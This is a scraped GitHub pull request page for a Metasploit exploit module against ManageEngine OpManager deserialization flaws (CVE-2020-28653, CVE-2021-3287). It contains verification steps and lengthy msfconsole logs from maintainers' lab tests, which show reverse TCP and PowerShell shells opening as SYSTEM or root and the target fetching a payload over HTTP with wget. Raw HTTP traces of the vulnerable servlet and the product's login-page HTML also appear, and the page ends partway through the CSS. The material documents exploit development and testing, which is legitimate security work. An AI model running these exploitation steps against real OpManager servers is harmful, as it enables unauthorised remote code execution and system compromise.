ysoserial.jar file to the tools directory 4. Run find_ysoserial_offsets.rb -p CommonsBeanutils1 5. Merge the output by hand with data/ysoserial_payloads.json, using the new name VERIFICATION * Start msfconsole * Do: use exploit/multi/http/opmanager_sumpdu_deserialization * Set the RHOSTS, TARGET, PAYLOAD and payload-related options as necessary * Do: run * You should get a shell. DEMO msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization [*] Using configured payload cmd/windows/powershell_reverse_tcp msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set RHOSTS 192.168.159.10 RHOSTS => 192.168.159.10 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set TARGET Windows\ PowerShell TARGET => Windows PowerShell msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set LHOST 192.168.159.128 LHOST => 192.168.159.128 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > check [*] 192.168.159.10:8060 - The target appears to be vulnerable. msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] An HTTP session cookie has been issued [*] The request handler has been associated with the HTTP session [*] Sending stage (200262 bytes) to 192.168.159.10 [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:50295) at 2021-09-13 16:31:45 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN-3MSP8K2LCGC OS : Windows 2016+ (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : MSFLAB Logged On Users : 7 Meterpreter : x64/windows meterpreter > The text was updated successfully, but these errors were encountered: 🎉 2 smcintyre-r7 added docs module rn-modules labels 23 days ago adfoster-r7 reviewed 23 days ago View changes tools/payloads/ysoserial/Dockerfile COPY find_ysoserial_offsets.rb / CMD ruby /find_ysoserial_offsets.rb -a ENTRYPOINT ["ruby", "/find_ysoserial_offsets.rb"] Copy link Contributor ADFOSTER-R7 23 DAYS AGO Any context on this change? 🕵️ Sorry, something went wrong. Copy link Contributor Author ZEROSTEINER 23 DAYS AGO • EDITED Yeah in the "Java Deserialization Updates" section I mentioned switching the docker container and dropping runme.sh. This removes the -a flag used by runme.sh since we shouldn't be updating all payloads at once anymore and makes the script the entry point so the container can be more easily used with user specified arguments. Admittedly once I fixed the diff-lcs 1.4 compatibility issue, I just ran the offsets tool natively on my system but I could see why some people might want to run it in docker so I kept the file and made it more flexible. Downloading specific versions of the built jars is handy to know what revision the payload data was generated with. Sorry, something went wrong. Copy link Contributor ADFOSTER-R7 COMMENTED 22 DAYS AGO Github tests are failing for unrelated reasons, if you rebase against master and push it up again, they should go green 👍 👍 1 Sorry, something went wrong. zeroSteiner added 8 commits 22 days ago Initial work on CVE-2021-3287 02fde3a Fix the diff-lcs v1.4+ bug 6b90582 Update find_ysoserial_offsets … 5219759 * Apply rubocop suggestions for style * Support patching an existing JSON file * Use an OptionParser Update the YSoSerial Dockerfile and remove runme … 4e28d3d Remove the runme script because we should no longer be updating all of the gadget chains at once because doing so would require that quite a few different modules be updated. Moving forward we should be updating individual chains using an incremental approach to allow us to validate the results of the find_ysoserial_offsets tool which is error prone. Add the generated YSoSerial gadget chain d483463 Apply rubocop changes and fix all targets d640866 Add and test the remaining targets 3986707 Write up the module docs Loading status checks… d82ed7d zeroSteiner force-pushed the feat/cve-2021-3287 branch from 4b360f9 to d82ed7d 22 days ago Correct the CVE reference Loading status checks… fb74888 zeroSteiner changed the title Add exploit for CVE-2021-3287 (Manage Engine OpManager RCE) Add exploit for CVE-2020-28653 (Manage Engine OpManager RCE) 21 days ago Copy link Member JMARTIN-R7 COMMENTED 21 DAYS AGO @msjenkins-r7 test this please. Sorry, something went wrong. space-r7 self-assigned this 21 days ago smcintyre-r7 changed the title Add exploit for CVE-2020-28653 (Manage Engine OpManager RCE) Add exploit for CVE-2020-28653 (ManageEngine OpManager RCE) 20 days ago smcintyre-r7 reviewed 20 days ago View changes data/ysoserial_payloads.json @@ -317,6 +317,17 @@ }, "Wicket1": { "status": "unsupported" }, "frohoff/ysoserial#168": { Copy link Contributor SMCINTYRE-R7 20 DAYS AGO Named to point to frohoff/ysoserial#168 so both PRs can move forward independently of each other. Sorry, something went wrong. 👍 1 smcintyre-r7 reviewed 20 days ago View changes modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb Show resolved Hide resolved zeroSteiner added 3 commits 20 days ago Update the module for CVE-2021-3287 9f971e8 Add automatic targeting for the CVEs Loading status checks… fd0f565 Add a note about exploitable versions Loading status checks… 4bccc05 Copy link Contributor SPACE-R7 COMMENTED 19 DAYS AGO Tested various versions on both Linux and Windows: Version 12.5.328 on Ubuntu 20.04 Linux Dropper Target msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization [*] Using configured payload cmd/windows/powershell_reverse_tcp msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.135 rhost => 192.168.140.135 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1 lhost => 192.168.140.1 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > show targets Exploit targets: Id Name -- ---- 0 Windows Command 1 Windows Dropper 2 Windows PowerShell 3 Unix Command 4 Linux Dropper 5 Python msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 4 target => 4 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] An HTTP session cookie has been issued [*] Detected version: 12.5.328 [*] The request handler has been associated with the HTTP session [*] Using URL: http://0.0.0.0:8080/fWMV6bUCRSxR3U [*] Local IP: http://192.168.1.199:8080/fWMV6bUCRSxR3U [*] Client 192.168.140.135 (Wget/1.20.3 (linux-gnu)) requested /fWMV6bUCRSxR3U [*] Sending payload to 192.168.140.135 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (3012548 bytes) to 192.168.140.135 [*] Command Stager progress - 134.17% done (161/120 bytes) [*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.135:33008) at 2021-09-16 16:49:13 -0500 [*] Server stopped. meterpreter > getuid Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0) meterpreter > sysinfo Computer : 192.168.140.135 OS : Ubuntu 20.04 (Linux 5.11.0-34-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > Python target msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] An HTTP session cookie has been issued [*] Detected version: 12.5.328 [*] The request handler has been associated with the HTTP session [*] Sending stage (39560 bytes) to 192.168.140.135 [*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.135:33048) at 2021-09-16 17:13:20 -0500 meterpreter > getuid Server username: root meterpreter > sysinfo Computer : ubuntu OS : Linux 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021 Architecture : x64 System Language : en_US Meterpreter : python/linux meterpreter > Version 12.3.238 on Ubuntu 20.04 - Failing on "Could not identify the remote version number" msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] An HTTP session cookie has been issued [-] Exploit aborted due to failure: unexpected-reply: Could not identify the remote version number [*] Exploit completed, but no session was created. Version 12.5.231 on Ubuntu 20.04 Python and Linux Targets msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] An HTTP session cookie has been issued [*] Detected version: 12.5.231 [*] The request handler has been associated with the HTTP session [*] Sending stage (39556 bytes) to 192.168.140.135 [*] Meterpreter session 3 opened (192.168.140.1:4444 -> 192.168.140.135:52602) at 2021-09-16 17:30:00 -0500 meterpreter > getuid Server username: root meterpreter > sysinfo Computer : ubuntu OS : Linux 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021 Architecture : x64 System Language : en_US Meterpreter : python/linux meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.140.135 - Meterpreter session 3 closed. Reason: Died msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 4 target => 4 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] An HTTP session cookie has been issued [*] Detected version: 12.5.231 [*] The request handler has been associated with the HTTP session [*] Using URL: http://0.0.0.0:8080/C6ouWVVE7yazy6S [*] Local IP: http://192.168.1.199:8080/C6ouWVVE7yazy6S [*] Client 192.168.140.135 (Wget/1.20.3 (linux-gnu)) requested /C6ouWVVE7yazy6S [*] Sending payload to 192.168.140.135 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (3012548 bytes) to 192.168.140.135 [*] Command Stager progress - 133.88% done (162/121 bytes) [*] Meterpreter session 4 opened (192.168.140.1:4444 -> 192.168.140.135:52606) at 2021-09-16 17:30:18 -0500 [*] Server stopped. meterpreter > getuid Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0) meterpreter > sysinfo Computer : 192.168.140.135 OS : Ubuntu 20.04 (Linux 5.11.0-34-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > Version 12.5.328 on Windows 10 x64 Windows Command and Dropper Targets msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization [*] Using configured payload cmd/windows/powershell_reverse_tcp msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.144 rhost => 192.168.140.144 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1 lhost => 192.168.140.1 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > options Module options (exploit/multi/http/opmanager_sumpdu_deserialization): Name Current Setting Required Description ---- --------------- -------- ----------- CVE Automatic yes Vulnerability to use (Accepted: Automatic, CVE-2020-28653, CVE-2021-3287) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.140.144 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 8060 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes OpManager path URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (cmd/windows/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.140.1 yes The listen address (an interface may be specified) LOAD_MODULES no A list of powershell modules separated by a comma to download over the web LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Command msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse SSL handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] An HTTP session cookie has been issued [*] Detected version: 12.5.328 [*] The request handler has been associated with the HTTP session [*] Powershell session session 1 opened (192.168.140.1:4444 -> 192.168.140.144:52715) at 2021-09-17 11:08:16 -0500 Windows PowerShell running as user space on DESKTOP-S81CMN3 Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Program Files\ManageEngine\OpManagerCentral\bin>whoami desktop-s81cmn3\space PS C:\Program Files\ManageEngine\OpManagerCentral\bin> ^C Abort session 1? [y/N] y [*] 192.168.140.144 - Powershell session session 1 closed. Reason: User exit msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > show targets Exploit targets: Id Name -- ---- 0 Windows Command 1 Windows Dropper 2 Windows PowerShell 3 Unix Command 4 Linux Dropper 5 Python msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 1 target => 1 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] An HTTP session cookie has been issued [*] Detected version: 12.5.328 [*] The request handler has been associated with the HTTP session [*] Command Stager progress - 17.11% done (2057/12025 bytes) [*] Command Stager progress - 34.21% done (4114/12025 bytes) [*] Command Stager progress - 51.32% done (6171/12025 bytes) [*] Command Stager progress - 68.42% done (8228/12025 bytes) [*] Command Stager progress - 84.70% done (10185/12025 bytes) [*] Command Stager progress - 100.55% done (12091/12025 bytes) [*] Sending stage (200262 bytes) to 192.168.140.144 [*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.144:52727) at 2021-09-17 11:09:13 -0500 meterpreter > getuid Server username: DESKTOP-S81CMN3\space meterpreter > sysinfo Computer : DESKTOP-S81CMN3 OS : Windows 10 (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > Version 12.3.295 on Windows Server 2019 - Failing on "Could not identify the remote version number" msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization [*] Using configured payload cmd/windows/powershell_reverse_tcp msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.149 rhost => 192.168.140.149 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1 lhost => 192.168.140.1 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set httptrace true httptrace => true msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > check #################### # Request: #################### POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1 Host: 192.168.140.149:8060 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 10 ??w? #################### # Response: #################### HTTP/1.1 200 Set-Cookie: JSESSIONID=3931AB320540EB670CA48B767BCA97F5; Path=/; HttpOnly Content-Length: 4 Vary: Accept-Encoding Date: Fri, 17 Sep 2021 20:40:20 GMT ?? [*] 192.168.140.149:8060 - The service is running, but could not be validated. msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse SSL handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) #################### # Request: #################### POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1 Host: 192.168.140.149:8060 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 10 ??w? #################### # Response: #################### HTTP/1.1 200 Set-Cookie: JSESSIONID=DB82AAAF2C105D85F8BA3464F194E142; Path=/; HttpOnly Content-Length: 4 Vary: Accept-Encoding Date: Fri, 17 Sep 2021 20:40:30 GMT ?? [!] The service is running, but could not be validated. #################### # Request: #################### GET / HTTP/1.1 Host: 192.168.140.149:8060 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) #################### # Response: #################### HTTP/1.1 200 Cache-Control: private Expires: Wed, 31 Dec 1969 18:00:00 CST Set-Cookie: JSESSIONID=E3F79E8675738CB73D8F6F346C24B664; Path=/; HttpOnly X-Frame-Options: DENY Content-Type: text/html;charset=UTF-8 Transfer-Encoding: chunked Vary: Accept-Encoding Date: Fri, 17 Sep 2021 20:40:30 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--[if IE]><meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1' /><![endif]--> <script> sessionStorage.clear(); var ntlm = false; </script> <input type="hidden" id="loadCookieMethod" value="true"> <title> ManageEngine OpManager </title> <script type="text/javascript"> function GetXmlHttpObject() { var objXMLHttp=null if (window.XMLHttpRequest) { objXMLHttp=new XMLHttpRequest() if (objXMLHttp.overrideMimeType) { // set type accordingly to anticipated content type objXMLHttp.overrideMimeType('text/xml'); //No I18N } } else if (window.ActiveXObject) { try { objXMLHttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { objXMLHttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } return objXMLHttp } </script> <SCRIPT LANGUAGE="javascript" SRC="/apiclient/fluidicv2/javascript/jquery/jquery-1.9.0.min.js"></SCRIPT> <script language="JavaScript"> function showForgotPassword() { $("#loginFirst").slideUp(400); $("#errorDiv").hide(); $("#mailErrorDiv").hide(); $("#forgotPassStatus").hide(); document.getElementById("authenticationDiv").style.display="none"; document.getElementById("forgotPasswordDiv").style.display="block"; $('#authenticationDiv').css({left:'-100%',opacity:'0'}); $('#forgotPasswordDiv').css({left:'0',opacity:'1'}); } function returnLogin() { document.getElementById("forgotPassStatus").innerHTML=""; document.getElementById("forgotPassStatus").style.display="none"; document.getElementById("forgotPasswordDiv").style.display="none"; document.getElementById("authenticationDiv").style.display="block"; $('#authenticationDiv').css({left:'0',opacity:'1'}); $('#forgotPasswordDiv').css({left:'100%',opacity:'0'}); } function generatePwd(mailId) { if(document.loginForm.uname.value=="") { alert("Kindly provide all the details."); return; } else { xmlHttp = GetXmlHttpObject(); if(xmlHttp != null) { xmlHttp.onreadystatechange = processStateChange; //var url = "/admin/SendPassword.do?uname="+document.loginForm.uname.value+"&domainName=NULL"; //No i18n var url = "/servlets/ForgotPasswordServlet?uname="+document.loginForm.uname.value+"&domainName=NULL"; //No i18n url= url+"&sid="+Math.random(); //No I18N xmlHttp.open("POST",url,true); xmlHttp.send(null); } } } function processStateChange() { if(xmlHttp.readyState == 4 || xmlHttp.readyState == "complete") { document.getElementById("forgotPassStatus").style.display="block"; document.getElementById("forgotPassStatus").innerHTML=xmlHttp.responseText; } } function GetXmlHttpObject() { var objXmlHttp = null; if(window.XMLHttpRequest) { objXmlHttp = new XMLHttpRequest(); } else if(window.ActiveXObject) { objXmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } return objXmlHttp; } var uName = ""; var autoSigin = ""; var pwd = ""; var dName = ""; var encyptedpwd = ""; var authrule_name = ""; function setincheckbox() { var url = "/servlets/SettingsServlet?"; //No I18N var dataParams = "readAutoLoginCookie=true";//No I18N if(window.location.pathname === "/apiclient/ember/index.jsp" && window.location.hash.indexOf('#/') !== -1){ dataParams=dataParams+"&cookieUpdate=true&cookieName=f2RedirectUrl&cookieValue="+window.location.href+"&cookieExpiry=-1";//No I18N }else{ dataParams=dataParams+"&eraseCookie=true&cookieName=f2RedirectUrl";//No I18N } $.ajax({ url: url, type: "POST",//No I18N dataType: 'json',//No I18N async: false, data:dataParams, success: function(jsonData) { uName = jsonData.userNameForAutomaticSignin; autoSigin = jsonData.signInAutomatically; pwd = jsonData.password; dName = jsonData.domainNameForAutomaticSignin; encyptedpwd=jsonData.encryptPassForAutomaticSignin; authrule_name=jsonData.authrule_name; } }); if(autoSigin == "false") { jQuery("#StayIn").removeAttr('checked'); //no i18n } else { jQuery("#StayIn").attr('checked',"true"); //no i18n } } function loadCredentialsFromCookie() { setScreenSize(); var loadCookie = document.getElementById("loadCookieMethod").value; if(autoSigin=="true" && (uName!==undefined && uName!=null && uName!="") && (loadCookie!==undefined && loadCookie!=null && loadCookie=="true")) { var errorExist = "false"; if(document.getElementById("errorMsg") !== undefined && document.getElementById("errorMsg") !== null) { errorExist = document.getElementById("errorMsg").innerHTML; } if(errorExist==="false") { signOn(uName,encyptedpwd,dName,authrule_name); } else { var e = document.getElementById("LoginDiv").style; e.display = "block"; if ( uName!=null ) { document.loginForm.userName.value = uName; } if ( pwd!=null ) { document.loginForm.password.value = pwd; } document.loginForm.userName.focus(); } } else { var e = document.getElementById("LoginDiv").style; e.display = "block"; if ( uName!=null ) { document.loginForm.userName.value = uName; } if ( pwd!=null ) { document.loginForm.password.value = pwd; } else { document.getElementById('password').setAttribute("class","loginFont pwdField opacity3"); } document.loginForm.userName.focus(); } } function signOn(uName,pwd,dName,authrule_name) { document.loginForm.loginFromCookieData.value = true; document.loginForm.userName.value = uName; document.loginForm.password.value = pwd; document.loginForm.AUTHRULE_NAME.value=authrule_name; if(authrule_name=="ADAuthenticator") { $('#domainNameDiv').attr({ name:'domainName', //No I18N value:dName }); if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD !== null) { document.loginForm.domainNameAD.value=dName; } } else if(authrule_name=="RadiusAuthenticator") { $('#domainNameDiv').removeAttr('name value'); //No I18N if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD !== null) { document.loginForm.domainNameAD.value="radiusUserLogin"; //No I18N } } else { $('#domainNameDiv').removeAttr('name value'); //No I18N if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD !== null) { document.loginForm.domainNameAD.value="Authenticator"; //No I18N } } document.loginForm.submit(); } // function userType() // { // var id = document.getElementById("loginFirst"); // if (false) // { // //alert('Showing the userDetails'); // eval("id.style.visibility = 'visible';"); // } // else // { // eval("id.style.visibility = 'hidden';"); // } // } var xmlHttp // function clearLoginInfo() // { // xmlHttp=GetXmlHttpObject() // if (xmlHttp==null) // { // alert ("Browser does not support HTTP Request"); //No I18N // return // } // var url="/showDetails.do?requestid=false"; //No I18N // url=url+"&sid="+Math.random();//No I18N // xmlHttp.onreadystatechange=processReqChange // xmlHttp.open("GET",url,true) // xmlHttp.send(null) // } // function processReqChange() // { // // only if xmlHttp shows "complete" // if (xmlHttp.readyState == 4) // { // // only if "OK" // if (xmlHttp.status == 200) // { // // ...processing statements go here... // response = xmlHttp.responseXML.documentElement; // result = response.getElementsByTagName('result')[0].firstChild.data; // //result = unescape(result); // var id = document.getElementById("loginFirst"); // if(result) { // //document.getElementById("loginFirst").visibility = 'visible'; // eval("id.style.visibility = 'hidden';"); // } // else // { // eval("id.style.visibility = 'visible';"); // } // } // else // { // alert("There was a problem retrieving the XML data:\n" + xmlHttp.statusText); //No I18N // } // } // //alert("Status Text:\n" + xmlHttp.statusText); // } function GetXmlHttpObject() { var objXMLHttp=null if (window.XMLHttpRequest) { objXMLHttp=new XMLHttpRequest() } else if (window.ActiveXObject) { objXMLHttp=new ActiveXObject("Microsoft.XMLHTTP") } return objXMLHttp } function loginSubmit() { if(document.getElementById("authenticationDiv").style.display=='block') { if(validateUser()) { //document.loginForm.submit(); return true; } else { return false; } } else { generatePwd(); } } function checkLogin(e) { var characterCode; if(e && e.which){ e = e characterCode = e.which } else{ e = event characterCode = e.keyCode } if(characterCode == 13) loginSubmit(); } function validateUser() { if(document.getElementById("authenticationDiv").style.display=='block') { document.loginForm.loginFromCookieData.value = false; var userName = trimAll(document.loginForm.userName.value); var password = trimAll(document.loginForm.password.value); if(userName == "") { alert("Please enter the User Name"); document.loginForm.userName.focus(); return false; } if(password == "") { alert("Please enter the password"); document.loginForm.password.focus(); return false; } var defaultDomainValue="Authenticator";//no i18n if(document.loginForm.domainNameAD !== undefined && document.loginForm.domainNameAD.value !== null) { defaultDomainValue=document.loginForm.domainNameAD.value; } if(defaultDomainValue=='NULL') { defaultDomainValue="Authenticator";//no i18n } if(userName=='trialuserlogin') { defaultDomainValue="Authenticator";//no i18n } if( document.loginForm.signInAutomatically.checked != null && document.loginForm.signInAutomatically.checked === true) { var url = "/servlets/SettingsServlet?requestType=AJAX&sid="+Math.random(); //No I18N var dataParams = "EncryptPassword="+password+"&userName="+userName+"&domainName="+defaultDomainValue+"&autoSignIn="+document.loginForm.signInAutomatically.checked+"&authRuleName="+document.loginForm.AUTHRULE_NAME.value;//No I18N $.ajax({ url: url, type: "POST",//No I18N dataType: "html",//No I18N async: false, data:dataParams }); } else { var url = "/servlets/SettingsServlet?requestType=AJAX&sid="+Math.random(); //No I18N var dataParams ="eraseAutoLoginCookie=true&cookieUpdate=true&cookieName=signInAutomatically&cookieValue=false&cookieExpiry=30";//No I18N $.ajax({ url: url, type: "POST",//No I18N dataType: "html",//No I18N async: false, data:dataParams }); } return true; } else { generatePwd(); } } function setScreenSize() { //getFlashVersion(); var screenWidth = 0, screenHeight = 0; if( typeof( window.innerWidth ) == 'number' ) { //Non-IE screenWidth = window.innerWidth; screenHeight = window.innerHeight; } else if(document.documentElement && (document.documentElement.clientWidth || document.documentElement.clientHeight)) { //IE 6+ in 'standards compliant mode' screenWidth = document.documentElement.clientWidth; screenHeight = document.documentElement.clientHeight; } else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) { //IE 4 compatible screenWidth = document.body.clientWidth; screenHeight = document.body.clientHeight; } //window.alert( 'Width = ' + screenWidth ); //window.alert( 'Height = ' + screenHeight ); document.loginForm.ScreenWidth.value =screenWidth; document.loginForm.ScreenHeight.value = screenHeight; } /*function getFlashVersion(){ var version = deconcept.SWFObjectUtil.getPlayerVersion(); var myflashversion =version['major'] +"."+ version['minor'] +"."+ version['rev']; if (document.getElementById && (version['major'] >= 0)) { createCookie("flashversionInstalled" ,myflashversion, 2); } }*/ function showDiv(DivId){ document.getElementById(DivId).style.display = 'block'; } // function hideDiv(DivId){ // if(DivId == 'loginFirst'){ // document.getElementById('loginFirst').innerHTML ="<table width=\"373\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tr><td width=\"13\" height=\"21\"><img src=\"/webclient/common/images/spacer.gif\" alt=\" \" /></td><td width=\"339\"></td><td width=\"21\" height=\"21\"><a href=\"javascript:hideDiv('loginFirst');clearLoginInfo();\"><img src=\"/webclient/common/images/spacer.gif\" border=\"0\" title=\"close\" /></a></td></tr></table>" // }else{ // document.getElementById(DivId).style.display = 'none'; // } // } // function forgetPass(){ // hideDiv('authenticationDiv'); //No I18N // //hideDiv('loginFirst'); // //document.loginForm.uname.focus(); // } function skipOption() { document.loginForm.userName.value = "trialuserlogin";//No I18N document.loginForm.password.value = "trialuserlogin";//No I18N //document.loginForm.domainName.value = "NULL";//no i18n //document.loginForm.authType.value = "localUserLogin";//no i18n loginSubmit(); } function setOpacityInputUser() { document.getElementById('userName').setAttribute("class","loginFont usrNameField opacity8"); } function setOpacity3InputUser() { document.getElementById('userName').setAttribute("class","loginFont usrNameField opacity3"); } function setOpacityInputEmail() { document.getElementById('uname').setAttribute("class","loginFont usrNameField opacity8"); } function setOpacity3InputEmail() { document.getElementById('uname').setAttribute("class","loginFont usrNameField opacity3"); } function setOpacityInputPwd() { document.getElementById('password').setAttribute("class","loginFont pwdField opacity8"); document.getElementById('password').type = 'password'; } function setOpacity3InputPwd() { document.getElementById('password').setAttribute("class","loginFont pwdField opacity3"); document.getElementById('password').type = 'text'; } function trimAll(str) { /************************************************************* Input Parameter :str Purpose : remove all white spaces in front and back of string Return : str without white spaces ***************************************************************/ //check for all spaces var objRegExp =/^(\s*)$/; if (objRegExp.test(str)) { str = str.replace(objRegExp,''); if (str.length == 0) { return str;} } // check for leading and trailling spaces objRegExp = /^(\s*)([\W\w]*)(\b\s*$)/; if(objRegExp.test(str)) { str = str.replace(objRegExp, '$2'); } return str; } </script> <link href="/apiclient/fluidicv2/styles/css/commonstyles.css" rel="stylesheet" type="text/css" > <script type='text/javascript' src='/apiclient/fluidicv2/javascript/plugins/select2.min.js'></script> <link rel='stylesheet' type='text/css' href='/apiclient/fluidicv2/styles/css/plugins/select2.min.css' /> <style> /* <---------- login page styles starts */ @font-face{font-family:'LatoBold';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/Lato-Bold.ttf') format('truetype');font-weight:normal;font-style:normal} @font-face{font-family:'LatoLight';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/Lato-Light.ttf') format('truetype');font-weight:normal;font-style:normal} @font-face{font-family:'LatoRegular';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/Lato-Regular.ttf') format('truetype');font-weight:normal;font-style:normal} @font-face{font-family:'RobotoSlabThin';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/RobotoSlab-Thin.ttf') format('truetype');font-weight:normal;font-style:normal} @font-face{font-family:'RobotoSlabLight';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/RobotoSlab-Light.ttf') format('truetype');font-weight:normal;font-style:normal} @font-face{font-family:'RobotoSlabRegular';src:url('/apiclient/fluidicv2/styles/css/plugins/fonts/RobotoSlab-Regular.ttf') format('truetype');font-weight:normal;font-style:normal} *{box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;-webkit-tap-highlight-color:rgba(0,0,0,0);outline:none} html,body{width:100%;height:100%;position:relative;overflow:hidden} body{background:url(/apiclient/fluidicv2/img/login/login-bg.png) repeat 100%/25%} #LoginDiv{width:100%;height:100%;padding:0;margin:0;position:absolute;top:0;left:0} #LoginDiv:before{background:#fff;width:450px;height:450px;content:'';margin:auto;border-radius:50%;box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-ms-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-moz-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-webkit-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);-o-box-shadow:0 15px 61px 5px rgba(0,0,0,.2);position:absolute;top:0;right:0;bottom:0;left:0;display:block;z-index:1} /*#LoginDiv:after{background:url(/apiclient/fluidicv2/img/login/noise-bg.png) no-repeat;width:100%;height:100%;content:'';margin:auto;position:absolute;top:0right:0;bottom:0;left:0;background-size:cover;-moz-background-size:cover;-webkit-background-size:cover;-o-background-size:cover;opacity:0.5}*/ 